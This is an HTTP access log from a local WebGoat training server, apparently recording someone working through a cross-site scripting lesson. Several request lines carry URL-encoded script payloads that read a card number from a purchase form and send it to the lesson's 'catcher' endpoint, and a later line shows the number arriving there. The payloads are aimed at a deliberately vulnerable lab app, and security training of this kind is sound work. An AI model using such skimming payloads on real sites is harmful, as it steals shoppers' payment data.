0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:00:04 -0400] GET /WebGoat/start.mvc HTTP/1.1 200 15943 http-bio-2210-exec-1 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:00:04 -0400] GET /WebGoat/service/debug/labels.mvc HTTP/1.1 200 43 http-bio-2210-exec-9 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:00:04 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10843 http-bio-2210-exec-1 12
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:00:04 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10843 http-bio-2210-exec-9 23
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:00:04 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10843 http-bio-2210-exec-1 13
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:00:04 -0400] GET /WebGoat/attack?Screen=297061215&menu=900 HTTP/1.1 200 2548 http-bio-2210-exec-2 68
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:00:05 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-9 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:00:05 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-8 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:00:05 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-5 13
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:00:05 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-6 13
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:00:05 -0400] GET /WebGoat/attack?Screen=297061215&menu=900 HTTP/1.1 200 2548 http-bio-2210-exec-2 22
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:00:05 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-1 21
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:00:05 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-9 10
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:00:05 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 116 http-bio-2210-exec-4 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:00:05 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10843 http-bio-2210-exec-10 14
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:00:05 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-10 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:00:05 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-9 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:00:05 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-1 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:00:05 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-4 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:00:05 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-2 8
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:00:05 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-7 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:00:05 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 116 http-bio-2210-exec-9 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:00:05 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10843 http-bio-2210-exec-10 17
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:01:54 -0400] GET /WebGoat/service/restartlesson.mvc HTTP/1.1 200 - http-bio-2210-exec-8 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:01:54 -0400] GET /WebGoat/attack?Screen=297061215&menu=900 HTTP/1.1 200 2548 http-bio-2210-exec-8 46
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:01:54 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-3 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:01:54 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-6 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:01:54 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-4 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:01:54 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-2 7
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:01:54 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-8 21
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:01:54 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-7 11
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:01:54 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 117 http-bio-2210-exec-4 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:01:54 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-3 11
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:01:57 -0400] GET /WebGoat/attack?Screen=297061215&menu=900&QTY1=0&QTY2=0&QTY3=0&QTY4=0&input1=4128+3214+0002+1999&input2=%3CSCRIPT%3E+function+hack()%7B+++++XssImage+%3D+new+Image%3B+++++XssImage.src+%3D+%22http%3A%2F%2Flocalhost%3A2210%2FWebGoat%2Fcatcher%3FPROPERTY%3Dyes%26stolenCardNum%3D%22+%2B+document.form.input1.value%3B+%7D+document.form.buy.setAttribute(%27onclick%27%2C+%27hack()%27)+%3C%2FSCRIPT%3E&buy=Buy HTTP/1.1 200 3099 http-bio-2210-exec-3 32
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:01:57 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-4 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:01:57 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-6 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:01:57 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-2 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:01:57 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 117 http-bio-2210-exec-4 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:01:57 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-2 5
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:01:57 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-7 40
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:01:57 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-3 46
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:01:57 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-8 43
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:11 -0400] GET /WebGoat/start.mvc HTTP/1.1 200 15943 http-bio-2210-exec-8 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:11 -0400] GET /WebGoat/service/debug/labels.mvc HTTP/1.1 200 43 http-bio-2210-exec-3 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:11 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-8 22
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:11 -0400] GET /WebGoat/attack?Screen=297061215&menu=900 HTTP/1.1 200 2548 http-bio-2210-exec-7 36
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:11 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-3 5
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:11 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-8 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:11 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-2 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:11 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-8 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:11 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-6 6
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:11 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-2 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:11 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-4 7
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:11 -0400] GET /WebGoat/attack?Screen=297061215&menu=900 HTTP/1.1 200 2548 http-bio-2210-exec-7 20
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:11 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 117 http-bio-2210-exec-6 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:11 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-8 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:11 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-3 31
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:11 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-8 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:11 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-2 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:11 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-4 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:11 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-6 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:11 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-7 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:11 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-3 16
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:11 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 117 http-bio-2210-exec-2 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:11 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-8 10
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:30 -0400] GET /WebGoat/service/restartlesson.mvc HTTP/1.1 200 - http-bio-2210-exec-8 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:30 -0400] GET /WebGoat/attack?Screen=297061215&menu=900 HTTP/1.1 200 2548 http-bio-2210-exec-8 21
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:30 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-2 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:30 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-4 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:30 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-7 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:30 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-3 6
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:30 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-6 8
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:30 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-2 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:30 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 117 http-bio-2210-exec-9 0
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:30 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-8 21
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:33 -0400] GET /WebGoat/attack?Screen=297061215&menu=900&QTY1=0&QTY2=0&QTY3=0&QTY4=0&input1=4128+3214+0002+1999&input2=%3CSCRIPT%3E+++++XssImage+%3D+new+Image%3B+++++XssImage.src+%3D+%22http%3A%2F%2Flocalhost%3A2210%2FWebGoat%2Fcatcher%3FPROPERTY%3Dyes%26stolenCardNum%3D%22+%2B+document.form.input1.value%3B+%3C%2FSCRIPT%3E&buy=Buy HTTP/1.1 200 2949 http-bio-2210-exec-8 22
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:33 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-2 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:33 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-4 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:33 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-3 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:33 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-6 5
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:33 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-9 6
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:33 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-8 20
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:33 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 117 http-bio-2210-exec-3 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:33 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-2 11
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:33 -0400] GET /WebGoat/catcher?PROPERTY=yes&stolenCardNum=4128%203214%200002%201999 HTTP/1.1 200 - http-bio-2210-exec-4 25
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:35 -0400] GET /WebGoat/start.mvc HTTP/1.1 200 15943 http-bio-2210-exec-4 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:35 -0400] GET /WebGoat/service/debug/labels.mvc HTTP/1.1 200 43 http-bio-2210-exec-2 9
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:35 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10843 http-bio-2210-exec-4 12
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:35 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10843 http-bio-2210-exec-2 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:35 -0400] GET /WebGoat/attack?Screen=297061215&menu=900 HTTP/1.1 200 2548 http-bio-2210-exec-3 25
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:35 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10843 http-bio-2210-exec-4 12
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:35 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-8 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:35 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-4 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:35 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-8 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:35 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 116 http-bio-2210-exec-4 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:35 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-9 25
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:35 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10843 http-bio-2210-exec-8 12
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:35 -0400] GET /WebGoat/attack?Screen=297061215&menu=900 HTTP/1.1 200 2548 http-bio-2210-exec-3 43
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:35 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-6 30
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:35 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-2 39
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:35 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-6 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:35 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-9 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:35 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-4 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:35 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-3 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:35 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-8 7
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:35 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-2 15
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:35 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 116 http-bio-2210-exec-4 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:02:35 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10843 http-bio-2210-exec-9 6
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:03:52 -0400] GET /WebGoat/attack?Screen=297061215&menu=900&QTY1=0&QTY2=0&QTY3=0&QTY4=0&input1=4128+3214+0002+1999&input2=%3CSCRIPT%3E+++++var+myButton+%3D+document.getElementsByName(%22buy%22)%5B0%5D%3B+++++function+myCardFunction()%7B+%09%09var+cardNum+%3D+document.getElementsByName(%22input1%22)%5B0%5D.value%3B%09%09+%09%09console.log(%22The+card+number+entered+is+%22+%2B+cardNum)%3B+%09%09window.location.href+%3D+%27http%3A%2F%2Flocalhost%3A2210%2FWebGoat%2Fcatcher%3FPROPERTY%3Dyes%26stolenCardNum%3D%27+%2B+cardNum%3B+%09%7D+++++myButton.addEventListener(%22click%22%2C+myCardFunction)%3B+%3C%2FSCRIPT%3E&buy=Buy HTTP/1.1 200 3415 http-bio-2210-exec-1 42
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:03:52 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-10 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:03:52 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-3 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:03:52 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-6 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:03:52 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-9 10
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:03:52 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 116 http-bio-2210-exec-3 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:03:52 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-5 36
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:03:52 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-1 51
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:03:52 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10843 http-bio-2210-exec-10 37
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:03:54 -0400] GET /WebGoat/service/restartlesson.mvc HTTP/1.1 200 - http-bio-2210-exec-10 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:03:54 -0400] GET /WebGoat/attack?Screen=297061215&menu=900 HTTP/1.1 200 2548 http-bio-2210-exec-10 23
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:03:54 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-1 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:03:54 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-6 5
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:03:54 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-9 5
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:03:54 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-5 7
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:03:54 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-10 16
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:03:54 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-3 10
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:03:54 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-1 7
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:03:54 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 117 http-bio-2210-exec-6 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:03:58 -0400] GET /WebGoat/attack?Screen=297061215&menu=900&QTY1=0&QTY2=0&QTY3=0&QTY4=0&input1=4128+3214+0002+1999&input2=%3CSCRIPT%3E+++++var+myButton+%3D+document.getElementsByName(%22buy%22)%5B0%5D%3B+++++function+myCardFunction()%7B+%09%09var+cardNum+%3D+document.getElementsByName(%22input1%22)%5B0%5D.value%3B%09%09+%09%09console.log(%22The+card+number+entered+is+%22+%2B+cardNum)%3B+%09%09window.location.href+%3D+%27http%3A%2F%2Flocalhost%3A2210%2FWebGoat%2Fcatcher%3FPROPERTY%3Dyes%26stolenCardNum%3D%27+%2B+cardNum%3B+%09%7D+++++myButton.addEventListener(%22click%22%2C+myCardFunction)%3B+%3C%2FSCRIPT%3E&buy=Buy HTTP/1.1 200 3415 http-bio-2210-exec-1 135
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:03:58 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-1 14
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:03:58 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-6 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:03:58 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-10 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:03:58 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-9 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:03:58 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-3 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:03:58 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-1 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:03:58 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-5 7
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:03:58 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 117 http-bio-2210-exec-10 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:03:59 -0400] GET /WebGoat/start.mvc HTTP/1.1 200 15943 http-bio-2210-exec-10 8
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:00 -0400] GET /WebGoat/service/debug/labels.mvc HTTP/1.1 200 43 http-bio-2210-exec-5 12
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:00 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-10 21
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:00 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-5 22
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:00 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-10 5
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:00 -0400] GET /WebGoat/attack?Screen=297061215&menu=900 HTTP/1.1 200 2548 http-bio-2210-exec-1 61
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:00 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-5 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:00 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-8 3
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:00 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-3 4
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:00 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-10 11
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:00 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-2 7
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:00 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-5 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:00 -0400] GET /WebGoat/attack?Screen=297061215&menu=900 HTTP/1.1 200 2548 http-bio-2210-exec-1 19
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:00 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 117 http-bio-2210-exec-3 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:00 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-8 9
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:00 -0400] GET /WebGoat/service/solution.mvc HTTP/1.1 200 28716 http-bio-2210-exec-3 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:00 -0400] GET /WebGoat/service/lessonplan.mvc HTTP/1.1 200 1105 http-bio-2210-exec-8 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:00 -0400] GET /WebGoat/service/cookie.mvc HTTP/1.1 200 335 http-bio-2210-exec-10 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:00 -0400] GET /WebGoat/service/hint.mvc HTTP/1.1 200 419 http-bio-2210-exec-5 2
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:00 -0400] GET /WebGoat/service/source.mvc HTTP/1.1 200 13184 http-bio-2210-exec-2 6
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:00 -0400] GET /WebGoat/service/lessoninfo.mvc HTTP/1.1 200 138 http-bio-2210-exec-1 13
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:00 -0400] GET /WebGoat/service/lessonprogress.mvc HTTP/1.1 200 117 http-bio-2210-exec-3 1
0:0:0:0:0:0:0:1 - - [16/Mar/2024:00:04:00 -0400] GET /WebGoat/service/lessonmenu.mvc HTTP/1.1 200 10844 http-bio-2210-exec-8 6
